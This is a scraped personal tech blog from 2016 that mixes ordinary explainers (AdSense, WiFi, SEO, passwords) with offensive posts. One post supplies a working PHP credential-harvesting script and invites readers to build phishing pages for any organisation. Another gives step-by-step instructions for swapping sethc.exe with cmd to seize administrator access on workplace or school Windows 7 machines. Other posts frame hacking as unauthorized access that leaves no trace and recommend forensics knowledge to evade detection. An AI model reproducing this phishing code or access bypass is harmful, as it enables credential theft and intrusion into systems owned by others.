AD (728x90)

Powered by Blogger.

Some Text

  • 2793 Pine St

    Living a dot com Lifestyle.

    When you choose dot com lifestyle, you actually choose a life of freedom where you can live and work as per your own time and you are always free from worries abour earnings

Friday, 22 July 2016

What is Google AdSense and how it Works?

Google AdSense is an Ad placement service that allows Publishers in the Google Network of Content Sites to serve automatic ads which target audience basis of their geo location, interest, and also use to serve ads that relates to the content in which readers are engaged. AdSense also acts as dashboard for the publishers where you can check and manage ads shown on your website and earnings from ads.



The complete Google Advertisement Network uses two channel systems, namely, Google AdSense for the Publishers and Google Adwords for the Advertisers. Adwords take the ads and fee for advertising from the merchants, service providers, firms and other such institutions that are willing to advertise through the medium of Google. After that the same ads are shown by the Publishers who are using AdSense to serve ads on their website. The system actually works perfect than any other online advertisement service because of large reach, power of targeting audience and two frontend advertising network.


We are talking about Google AdSense that is a very good opportunity for the publishers to make money by serving ads on their blogs and websites. Google AdSense pays to its publishers for each click on the ads served by him on his website or blog. The term that is officially used for pay per click in the Google Advertising is CPC(Cost Per Click), it is very commonly used term and is defined as, “CPC(Cost Per Click) is the amount paid by Google AdSense for a single click to the publisher”, And that is one of the main factor that makes Google AdSense so popular.

Here is a Diagram that will help you to understand functioning of Google Ads network and Google AdSense works.


The process starts with Google Adwords from where Google get Ads and money, then it passes it to Google Adsense after taking out it's commission. Actually Google charges for every click from the advertisers and out of that Google keep it's commission and add rest in Adsense account of the Publisher.

As per my personal experience Google AdSense is best PPC advertising network for the publishers, I am using AdSense to monetise my Blogs and websites from past 2 years and I want to tell you there is no hurdle in making money from AdSense if you are not going against AdSense Policies. I would suggest you to read it carefully before applying for AdSense. To prevent interest of Advertisers and Publishers AdSense have some strict rules that every publisher need to follow to make money from Google AdSense. For the new bloggers it is best option to start selling ad-space as it is most convenient and simple to use advertising system for the publishers.

Friday, 10 June 2016

Introduction To Information System

Information System take birth from the Information Technology, but it is no more just a part of Information Technology. Today, Information System has provided highly productive results and becoming more efficient with every passing day. Essentially, it provides the necessary information for business operations. It has been designed with the aim to support all business functions. The complex business functions get help from various types of Information Systems to sustain and develop in dynamic business environment.


Information System is made up of two terms, namely, Information and System. Information can be defined as well-arranged and structured meaningful data, and System is an arrangement for accessing, using, and modifying the information by taking input and providing output after completing the required process. In simple words, Information System is an arrangement that processes data and provides meaningful information. An Information System use several interrelated components like to collect, store, process, generate, and disseminate information for effective business functioning. Such information is very important for every organization as it supports decision making and also helps in controlling various organizational departments and their functions. Information System can be useful for both individual departments and all departments collectively.

An Information System Model
The data for an Information can be collected from various sources such as employees for their personal details and competitors performance. This data can be stored in printed format over the paper and electronic format with the help of a computer. The processing of this data includes calculations, logical analysis, and other statistical methods, depending upon the information that we want to derive. After the processing of data, it is transformed into information. This information helps and supports end users for decision making, problem solving, strategy forming, and controlling functions in an organization.

For example, the data about individual sales by each sales associate in a month, the general sales target for each associate, and market sales trends for that month can be put to use. This data can be stored, classified, and analyzed to produce meaningful information about the sales trends for that time period, gaps between the targets and actual sales for individual associates, and the aggregate sales based on teams. The same data can also be used for predicting the sale for next month, target setting for the next month, and planning for future sales.

Friday, 27 May 2016

How to Hack Windows 7 To Claim Admin Account

On workplaces, school labs usually the administrator access is secured with password and a guest access is provided. And some times it becomes a great hurdle in the way of doing something that requires admin permission. As a solution to this problem I cane up with my new post about Hacking Windows 7 which will guide you through out the process of Hacking windows 7 without any additional hardware and software with the help of a little back door trick.

Follow these simple steps to hack the Windows 7 easily :

Step 1 - Turn on the power and CPU and press F8 rapidly on boot screen to get to the Start-up menu.

Windows Start-up Menu

Now choose Start Windows Normally option from the menu, hit Enter button and immediately turn off the power.

Step 2 - Now again turn on the power and let the system load the two options, first one is Launch Start-up repair(recommended) and Start Windows Normally.


We have to go with the first option that is Launch Start-up repair(recommended), and let it load and scan for issues.

Step 3 - After scanning it will ask you to "restore defaults" , select cancel option.


and let it continue, after 15 to 20 minutes an error report would appear asking send information or not.

Step 4 - Ignore it, click on "View Problem Details" arrow, scroll down to the end of the report, then click a link stating X:\windows\ something...something (the link starts with an"X")

Another Window will pop-up, and will look like a notepad (it is a notepad)


Click File on the Menu-Bar, then select Open, and another window will pop-up (that's just too many windows!)

Step 5 - Navigate to C: drive (or whatever drive on which windows is installed), click Windows, then System32, after that click on the arrow beside the "File Type" option and select "all files"


Then search for a file named "sethc"(this is the shortcut to stickey keys), rename it to something else (Eg:abc), and Now Search for cmd, make its copy and rename the copy as "sethc"
Step 6 - Close everything, restart the PC, go to the log-in screen, press shift 5 times, until a cmd (command prompt) pops-up.


Type in "net user administrator /active:yes", and this will activate the default administrator account of the PC. Change/delete/manage/reset passwords from there, Or you can directly change passwords from cmd, type "net user (admin/any admin account's name) and then after a space put an asterix.

Tuesday, 24 May 2016

How to change pattern screen lock on Android mobile without Gmail.



Pattern lock is most commonly used medium for the security of our Android phones and it seems to be best option to keep out android device secure device. On other hand, it creates problem for many guys also, when we forgot our android mobile pattern lock, its very difficult to unlock it. Being a tech guy it looks odd to go to a shot  who will surely charge you some money to unlock your android mobile. But Today,I am sharing amazing method to reset pattern lock easily. This method comes in handy when you forgets password of your gmail account. Thus you don't even need Gmail password to reset your Android mobile pattern even without loosing data.

Nowadays, most of guys owns android phone, and when you give your android phone to small children or any other guy, and by mistake they change pattern lock of your mobile or they try wrong password many times, than your android device is completely locked. So, using this method you can easily reset or unlock pattern of your android device.


With the help of this tutorial I am showing you method to reset pattern lock of android mobile easily, if you have forgotten pattern lock of your android phone. Just follow these steps to unlock your android device.

  1. Switch off your android phone.
  2. Now we need to get booted into the recovery of the device and for that we have different options for different devices. For Samsung devices press "Volume up + Power Key + Home button" at the same time and for other devices press " Volume down + Power Key + Home button" at the same time.
  3. Now you will be booted in the recovery section here use volume keys for scrolling and use Homr or Power key for selecting an option.
  4. Look for Wipe Data or Delete all user data or Restore factory defaults and select it using Power button.
  5. Now reboot your phone and congratulations you have unlocked device without spending a single panny.

Sunday, 22 May 2016

What is WiFi and How does it work?



WiFi is a wireless networking technology that uses radio waves for the network connectivity. WiFi establishes a WLAN(Wireless Local Area Network) by allowing connectivity to electronic devices and the wireless connection is based on the 2.4 gigahertz (12 cm) UHF and 5 gigahertz (6 cm) SHF ISM radio bands. Basically an adopter is used to create hotspots that covers an area and makes it wifi zone in which any device can connect to the hotspot it only need to be WiFi enabled.

Devices which can use Wi-Fi technology include personal computers, video-game consoles, smartphones, digital cameras, tablet computers and digital audio players. Wi-Fi compatible devices can connect to the Internet via a WLAN network and a wireless access point. Such an access point (or hotspot) has a range of about 20 meters (66 feet) indoors and a greater range outdoors. Hotspot coverage can be as small as a single room with walls that block radio waves, or as large as many square KM achieved by using multiple overlapping access points.

Wi-Fi is less secure than wired connections, such as Ethernet, precisely because an intruder does not need a physical connection. Web pages that use TLS are secure, but unencrypted Internet access can easily be detected by intruders. Because of this, Wi-Fi has adopted various encryption technologies. The early encryption WEP proved easy to break. Higher quality protocols (WPA, WPA2) were added later. An optional feature added in 2007, called Wi-Fi Protected Setup (WPS), had a serious flaw that allowed an attacker to recover the router's password. The Wi-Fi Alliance has since updated its test plan and certification program to ensure all newly certified devices resist attacks
.


Wi-Fi connections can be disrupted or the Internet speed lowered by having other devices in the same area. Many 2.4 GHz 802.11b and 802.11g access-points default to the same channel on initial startup, contributing to congestion on certain channels. Wi-Fi pollution, or an excessive number of access points in the area, especially on the neighboring channel, can prevent access and interfere with other devices' use of other access points, caused by overlapping channels in the 802.11g/b spectrum, as well as with decreased signal-to-noise ratio (SNR) between access points. This can become a problem in high-density areas, such as large apartment complexes or office buildings with many Wi-Fi access points. It is advised to only use channel 1-6-11.

Additionally, other devices use the 2.4 GHz band: microwave ovens, ISM band devices, security cameras, ZigBee devices, Bluetooth devices, video senders, cordless phones, baby monitors, and, in some countries, amateur radio, all of which can cause significant additional interference. It is also an issue when municipalities or other large entities (such as universities) seek to provide large area coverage.

How WiFi works?

Like mobile phones, a WiFi network makes use of radio waves to transmit information across a network. The computer should include a wireless adapter that will translate data sent into a radio signal. This same signal will be transmitted, via an antenna, to a decoder known as the router. Once decoded, the data will be sent to the Internet through a wired Ethernet connection.

As the wireless network works as a two-way traffic, the data received from the internet will also pass through the router to be coded into a radio signal that will be received by the computer's wireless adapter.

WiFi Frequencies

A wireless network will transmit at a frequency level of 2.4 GHz or 5GHz to adapt to the amount of data that is being sent by the user. The 802.11 networking standards will somewhat vary depending mostly on the user's needs.

The 802.11a will transmit data at a frequency level of 5GHz. The Orthogonal Frequency-Division Multiplexing (OFDM) used enhances reception by dividing the radio signals into smaller signals before reaching the router. You can transmit a maximum of 54 megabits of data per second.

The 802.11b will transmit data at a frequency level of 2.4GHz, which is a relatively slow speed. You can transmit a maximum of 11 megabits of data per second.

The 802.11g will transmit data at 2.4GHz but can transmit a maximum of 54 megabits of data per second as it also uses an OFDM coding.

The more advanced 802.11n can transmit a maximum of 140 megabits of data per second and uses a frequency level of 5GHz.

PHP Script For Phishing



Phishing is a technique used to steal sensitive and personal information by the medium of a fake webpage that exactly looks like a webpage of a reputed website or financial institution. I have deeply explained about Phishing in my previous post.

Have you ever thought how does the PHP script saves the login credentials to a text file and What is that script?, There is nothing special in this script it is just a simple PHP script that saves the information directly to a text file. This is one of the basic function of PHP that is generally used for gathering information through the medium of a form. The same is happening here, there is a certain action performed on pressing the login button that opens and executes the php script that we are using to save the login information to a text file.

Here I have bring PHP script for you that you can use for with any login page just by putting the php file name in the action attribute of the login button.

<?php
header ('Location:http://www.ayushtyagi.com');
$handle = fopen("hacked.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Using this script you can make phishing page for any organisation and website. Hope you will like it...

What is Phishing?

Phishing


Phishing is a technique used for stealing sensitive personal information such as password, credit/debit card details etc, through the help of a fake webpage that exactly looks like a webpage of a reputed organization.

In general words phishing is a fraud that is triggered by attacker to get financial credentials of the desired person. Phishing is very popular among the cyber criminals as it is easiest part of hacking not part but a little trick. In the process of phishing the attacker creates a webpage that denotes a reputed website but actually it is a fake page that saves the information in a particular file with the help of a script that is usually a php script.

When attacker prepares for a phishing attack, the only challenge that he has to face is to redirect the victim to the page prepared by the attacker. That is usually done through the medium of a mail containing the link to the attacking page and once the victim clicks the link he would be redirected to the page that is quite hard to recognize if it is original page of the entity or not. For example, suppose I am attacker and want to trap a person to get his Facebook username and password, the first step that I would be taking is to create a fake Facebook login page and force the victim to open the page that is hosted somewhere and type his login credentials (username and password), both the text fields are connected via PHP in such a way that the text entered would be automatically saved in a file hosted on the same server.

Generally attackers use to send email which looks genuine as if sent by the original entity because of logos and other identifying information taken from the original website, Besides mail the attackers can also redirect the victim to phishing page by making them click on the link and also malware can be used that would redirect the victim to the page. To make the phishing attack more effective the hackers redirect the victim to original site so that he/she may not be able to recognize that they are trapped.

To understand phishing more deeply have a look on the below diagram that explains the live phishing.

Phishing


In the above diagram there is a victim, a server hosting a website and a communication channel. You can see how the attacker has interrupted the communication channel between the victim and the server by redirecting the victim to a fake webpage and then after again redirected the user to original website.

Although Phishing is not hacking but a fraudulent practice that is most commonly used by the attackers and everyday thousands of people are targeted by the attackers.

Here I have created a phishing login form that would help you to understand phishing more deeply. As practical approach is must. Below this text you can see a login form but actually what is hidden behind this form. Yea there is a PHP script that is working behind this but first you test this login form..




Now you can check what you entered in the below file by refreshing the page..




Now you have experienced how the attackers use phishing for targeting internet users. There is just a simple script that is working behind the login form you can read and learn about the PHP script for phishing in my another post.

Friday, 20 May 2016

What is Reverse Engineering?



Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software.

Software reverse engineering is done to retrieve the source code of a program because the source code was lost, to study how the program performs certain operations, to improve the performance of a program, to fix a bug (correct an error in the program when the source code is not available), to identify malicious content in a program such as a virus or to adapt a program written for use with one microprocessor for use with another. Reverse engineering for the purpose of copying or duplicating programs may constitute a copyright violation. In some cases, the licensed use of software specifically prohibits reverse engineering.

Hardware Reverse Engineering

Hardware reverse engineering involves taking apart a device to see how it works. For example, if a processor manufacturer wants to see how a competitor's processor works, they can purchase a competitor's processor, disassemble it, and then make a processor similar to it. However, this process is illegal in many countries. In general, hardware reverse engineering requires a great deal of expertise and is quite expensive.

Tools Used In Reverse Engineering

There are lots of tools on the market. Toad from Quest and Quest's new Knowledge Base tools (previously from RevealNet) will reverse engineer the database for you. And there are other tools as well like Oracle Designer, etc. So they are out there, but they will cost money.

If you are using Oracle 9i, then you can look at the DBMS_METADATA package. This package will reverse engineer any database object for you.

Another free avenue is the export file of the database. You've already mentioned the INDEXFILE option, but the SHOW option also works. Both are a little "messy" though.

And you can search the WWW for many, many scripts out there to do this as well.

Reverse Engineering For Mobile Apps

Reverse engineering applications help penetration testers understand how the application works and discover weaknesses that can be used by Hackers in a real-world attack. It’s also used to find hidden malware in the underlying code. For example, enterprises that are risk averse may decide to set up their own mobile app store, giving employees approved applications that have been vetted and whitelisted for use on their smartphone or tablet devices.

Thursday, 19 May 2016

What is SEO?

SEO


SEO (Search Engine Optimization) is a process of grabbing good position in the Search Engine's unpaid results with motive to get organic, natural and free free traffic on a desired website, the SEO is a six step process namely, research, report and goal setting, content building, page optimization, link building, social presence building and analysis.

The SEO is a necessity for every website as without SEO a website could not survive on any search engine. Getting on the top of SERP(Search Engine Result Page) is the dream of every website owner as it is the largest source of traffic and is also targeted traffic, But due to large number of websites the competition level raise up and that makes it more difficult to gain good placement at SERP.

Basically SEO is done in two parts,

  1. On-page SEO
  2. Off-Page SEO

1. On Page SEO

On Page SEO refers to those SEO techniques that are performed on the webpage itself just like internal and external link building, Meta tags, content, images, title etc, This type of SEO techniques effects SERP of a page or website from inside and are completely in our hands.

2. Off Page SEO

These SEO techniques affects the rank of a page or website from outside the websites. For example back links, as back links from other known websites directly have a good impact over the health of the website. 
 The first search engine was Archie which was created in 1990 by Alan Emtage

We all are aware that SEO helps in making a website such way that search engines expects from us. Let us take example of Google it requires meta tags and a XML Sitemap to crawl pages and index them. The process of Crawling is used by the Search Engines to optimize and check a webpage for measuring it's importance and with the help of algorithms the system automatically position the webpage on the SERP.

Keywords are the another important part of SEO that you can specify using a meta tag, So that search engines can easily understand your main keywords and position you according to it. Search Engines always ranks pages by identifying the keywords and using keywords in proper manner can let you to success.

SEO increases website traffic by dint of it's appropriate usage on your web page ( content or article post). In this regard, two steps are major: Keyword application in the useful content and link building from higher authority sites. Keyword placement in the right places, such as Title, URL, H1+H2 tag, content body, image ALT tag, Image file name, could help you to optimize your on-page for Google ( and other SE) indexing. On the other hand, link building from upper value authority sites could help you boost your site go upper rank in the SERP. Thus, you could find your site available on the SERP and people will search+visit your site as powerful as the keywords are!

Thus, you could find increased traffic on your site, even while you are sleeping as well.

14 skills to become a Master Hacker

All of us are aware that Hacking is really a endless subject and we all keep learning new things everyday. There is a question " What are essential skills to become a Master Hacker?" which many of my friends keep asking me and from last last year I was thinking about it and finally after 5 months of thinking I have gathered almost everything that is essential to become a Master Hacker.

Master Hacker


As Hacking is itself is most skilled Information Technology art that requires very deep knowledge of Information Technology and my final conclusion after thinking five months is that, one must master may skills. Today I will be sharing all those skills that one need to be a Master Hacker. These skills would be a base on behalf of which you can prepare for future.

As per my personal experience there are 14 skills that I think one must have to become a master hacker. I am listing all these skills below :

1. Basic Computer Skills

It probably goes without saying that to become a hacker you need some basic computer skills. These skills go beyond the ability to create a paint file or cruise the Internet. You need to be able to use the command line in Windows, edit the registry, and set up your networking parameters as these are the basic parameters to start the journey to become a master hacker.

2. Networking Skills

Networking skills are among the basic requirements for performing a hack. As Hacking includes exploiting technologies and to exploit these technologies we need to know them well. Here is the list of network technologies that we need to learn.
  • DHCP
  • NAT
  • Subnetting
  • IPv4
  • IPv6
  • Public v Private IP
  • DNS
  • Routers and switches
  • VLANs
  • OSI model
  • MAC addressing
  • ARP

 3. Linux Skills

It is extremely critical to develop Linux skills to become a hacker. Nearly all the tools we use as a hacker are developed for Linux and Linux gives us capabilities that we don't have using Windows. The tools that can be used in Linux can never work on Windows.

4. Virtual Box

It is very necessary to know well about using Virtual Box and similar software. Ideally, you need a safe environment to practice your hacks before you take them out in real world. A virtual environment provides you a safe environment to test and refine your hacks before going live with them.

5. Security Concepts and Technologies

A good hacker must understands security concepts and technologies. The only way to overcome the roadblocks established by the security admins is to be familiar with them. The hacker must understand such things as PKI (public key infrastructure), SSL (secure sockets layer), IDS (intrusion detection system), firewalls, etc.

6. Wireless Technologies

In order to be able to hack wireless, you must first understand how it works. Things like the encryption algorithms (WEP, WPA, WPA2), the four-way handshake, and WPS. In addition, understanding such as things as the protocol for connection and authentication and the legal constraints on wireless technologies.

7. Scripting

Without scripting skills, the hacker will be relegated to using other hackers' tools as all hacking tools works with scripts. This also limits your effectiveness. Every day a new tool is in existence loses effectiveness as security admins come up with defenses.

8. Database Skills

It is very usual and common that hackers do everything just to access database which admins are protecting with the help of several security measures. To be a good hacker you need to learn and understand databases. This includes the SQL language. I would also recommend the mastery of one of the major DBMS's such SQL Server, Oracle, or MySQL.

9. Wireshark or Tcpdump

Wireshark is the most widely used sniffer/protocol analyzer, while tcpdump is a command line sniffer/protocol analyzer. Both can be extraordinarily useful in analyzing TCP/IP traffic and attacks.

10 Advanced TCP/IP

The beginner hacker must understand TCP/IP basics, but to rise to the intermediate level, you must understand in intimate details the TCP/IP protocol stack and fields. These include how each of the fields (flags, window, df, tos, seq, ack, etc.) in both the TCP and IP packet can be manipulated and used against the victim system to enable MitM attacks, among other things.

11. Cryptography

Although one doesn't need to be a cryptographer to be a good hacker, the more you understand the strengths and weaknesses of each cryptographic algorithm, the better the chances of defeating it. In addition, cryptography can used by the hacker to hide their activities and evade detection.

12. Reverse Engineering

Reverse engineering enables you to open a piece of malware and re-build it with additional features and capabilities. Just like in software engineering, no one builds a new application from scratch. Nearly every new exploit or malware uses components from other existing malware.

13. Forensics

To become good hacker, you must not be caught! You can't become a pro hacker sitting in a prison cell for 5 years. The more you know about digital forensics, the better you can become at avoiding and evading detection.

14. Problem-Solving Skills

A hacker is always coming up against seemingly unsolvable problems. This requires that the hacker be accustomed to thinking analytically and solving problems. This often demands that the hacker diagnose accurately what is wrong and then break the problem down into separate components. This is one of those abilities that comes with many hours of practice.

Wednesday, 18 May 2016

What is Search Engine ?



Search Engine is a software or a programmed script that returns the result that arranged and based on the quality of the content for the particular keywords that are searched by the user. In simple words Search Engine is a gateway to access the desired piece of information from the World Wide Web. Google, AOL, Bing, Yahoo are some popular search engines.

Google is most popular search engine on which more then 40,000 people are searching. As Google is most common search engine and all of us prefer to use it for searching anything on the internet. Let us take an example, suppose you have to search something on the internet like, What is Hacking?, for this you will open the Google type your questions there and click on search button and as the outcome you will get the results.

The first search engine was Archie which was created in 1990 by Alan Emtage, a student at McGill University in Montreal. At that time the Search Engine Archie give search results from few hundred websites and most of them were College websites but today there are uncountable websites on the World Wide Web that are optimized and shown in search results by search engines.


Do you Know ? Every day, 16% of the searches that occur are ones that Google has never seen before.
We all use search engines like Google but that is only front end of the system have you ever thought what happens when a query is searched on a search engine ? We are just enjoying the front end of the Google and are unaware of its functioning. A single Google search requires more computing power than it took to send Apollo 11 to the Moon. Search engines like Google use Algorithms that are programs and formulas to deliver the best result for every search that is made on it. There is a term SEO that is Search Engine Optimization which helps the Search Engines to optimize and index the webpages. When we type a query on the Search Engine, the lightning fast processing starts and in one blink of eye the result is in front of you.

Search Engines(Google) ranks the websites on the basis of 200 factors that automatically determines importance and the usefulness of the content and accordingly gives the result. Google is programmed in such a way that it does not need any human efforts while processing a query and is the biggest name on the internet where daily new ideas are born and algorithms keep changing based on the ideas of the engineers.

Below is an example of Search Engine :

                                        Search Engine
This is an example of search engine you can try by Searching anything on it.

Monday, 16 May 2016

What is Password ?

password


Password is an encrypted combination of numbers, letters and special symbols, typically between 4 to 16 characters that allows authorized access to a computer, interface or system. The password helps ensure that unauthorized users do not access the computer. In addition, data files and programs may require a password.

Since the invention of computer password in 1960s by Fernando Corbato, it is most trusted, reliable and secure method that is used everywhere today. Everywhere on the internet, computers, ATM, mobile phones passwords are used for keeping our accounts and data safe. Usually password is based on ASCII pattern that is the American Standard keyboard layout.

Today even after developing advance security methods we are still using password and no other security measure can ever replace it. All the social sites even the Facebook uses password for securing it's users account.

The password system works usually with a username that differentiate each account with the help of Primary Key that makes every username unique. Every valid combination of username and password authenticates the user and provides access only if the person is authorized user of the account. Now the question comes how the password works? Password works with the help of a two way system that works with front end as the main GUI part that can be a webpage, program, computer etc and the back end that is a database that contains all the username and passwords. When a user enters a username and the password the system check it in the database if it is valid combination or if it is then the access is granted and if not then system deny for the access. PHP is the most commonly used programming language that is used for the connectivity of front end to the database.

The encryption of the password makes it more secure and difficult for an unauthorized person to hack the password.

Sunday, 15 May 2016

What is Hacking ?



Hack, a small but powerful word which means “Use a computer system to gain unauthorized access to another computer system”. There are several definitions for the word hacking but the one that perfectly fits is “Hacking is the process of breaking the security for unauthorized access.” In this particular definition a word comes security that refers to any software, program or any other thing that prevents unauthorized access.

When we start the run to access some secure information or data without the will and wish of owner there come a big hurdle in our way that is password. Password is encrypted combination of numbers, alphabets and special symbols that only allows the authorized user to access the system. Since the invention of password it is the first preference for the data security as it is comparatively more trustworthy, reliable and secure. Even though we have developed many more systems and methods for the data security but still 99% systems relay on the passwords for the security. Thus it becomes necessary to understand the passwords.

Password is just one way to access the secure data on any computer, server or any other device other than that there are many more ways that can be used for gaining access to any system which are also known as Back Doors. Back door hacking is a way where the hacker has to have a deep look over the complete system and tries to access the system without password like by finding a week security point. Suppose you are a thief and you are planning to enter a house, what you will do if you are unable to use front door for entering the house? Off course you will look for the backdoor or any open window that can easily let you access the house. In the very same manner the password is front door the any system and all other ways comes into backdoors. Usually these backdoors doesn’t let the owner or authorized user to know about the unauthorized access besides this these backdoors are the week and unsecure points of any system that a person who know well about the security system can easily exploit.

Whenever we are planning to hack any system the very basic thing that we need to understand is the security system. If you think hacking is easy or just include some tools to exploit a secure system you are wrong. There are several tools that are used in the process of hacking but it is not definite that those tools are perfect for the operation that we need to perform and that is the reason a good hacker dependent upon his own created and modified tools. Let us take an example to understand what hacking actually is and how a hacker hacks.

Let us suppose a website xyz.com whose database we need to access in an unauthorized manner without the knowledge of the owner of the databases. Today most of the systems works on PHP and MySQL for managing the databases let’s assume same about this particular system. Now the website must be hosted on some server that is secure with a encrypted password. Now the first thing that you need to understand is how the security system of this particular server is working. Have you ever think about the web pages that we are accessing they are also placed at the same place and if we can access these web-pages then why not other data? Here comes permissions, as public you can only access those data that owner is allowing you the data that we need to access is not public so how can we access it ? If you are well aware about the security system you might not be thinking this but you must be working on the way that can be used to exploit. What if we can proof to the system that we are not public but the authorized user of the data and this is what we are going to learn in our journey to become a professional hacker.

We will start with the basic of hacking with understanding the different kinds of security systems and the possible ways to expose them. In this journey you will be learning several new things as only unauthorized access is not hacking but it is when you access some data without coming in light and even there is no proof that you accessed it that is the complete hacking process. I consider the accessing some secure system just half of the process of the hacking complete process involves much more things like how can you prevent your IP address from being traced and even many more things like to modify the internal data without letting anyone know about it and cracking the security system whether it is a password, a robot, captcha, any software or program. Hacking is a very wide subject and there is no end to it. I am personally researching and learning hacking from past 5 years and belief me every day I learn something new, sometimes great challenges comes in front of me and they may take even a month to solve that is what I feel hacking is a challenging game.

A good hacker needs to have some essential qualities and these qualities make a person perfect hacker and I hope you will develop these qualities soon. These qualities are not birth these will be developed with time and the most important one decision making power and the time management, a hacker always need to respect time as in the hacking world even a second is very important and sometimes we have to perform some tasks even in mille-seconds and when the time is less you obviously need good decision making power. You can read more about the qualities of a good hacker in one of my post.

Hacking is a very wide subject which has no end and a real hacker is one who keep exploring and learning new things.


Intresting Posts

COPYRIGHT © 2015-16 Ayush Tyagi. All rights resevered.